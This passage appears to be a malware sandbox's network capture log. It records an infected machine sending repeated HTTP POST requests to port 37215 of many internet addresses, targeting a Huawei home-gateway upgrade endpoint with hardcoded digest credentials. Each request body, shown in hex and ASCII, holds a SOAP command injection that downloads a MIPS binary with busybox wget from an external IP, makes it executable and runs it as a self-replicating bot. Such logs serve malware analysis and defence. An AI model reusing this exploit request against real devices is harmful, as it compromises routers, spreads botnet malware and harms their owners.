                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2583192.168.2.233862041.22.116.9737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627931118 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2584192.168.2.233828041.47.237.19537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627949953 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2585192.168.2.2348976181.105.224.25337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627955914 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2586192.168.2.2336858197.5.193.15037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627958059 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2587192.168.2.234339020.240.41.14337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627963066 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2588192.168.2.2343948157.212.146.737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627976894 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2589192.168.2.2349318197.176.165.237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.627976894 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2590192.168.2.2336374157.175.65.9937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628017902 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2591192.168.2.2358188157.82.150.14537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628021955 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2592192.168.2.235024041.162.165.1937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:14.628050089 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
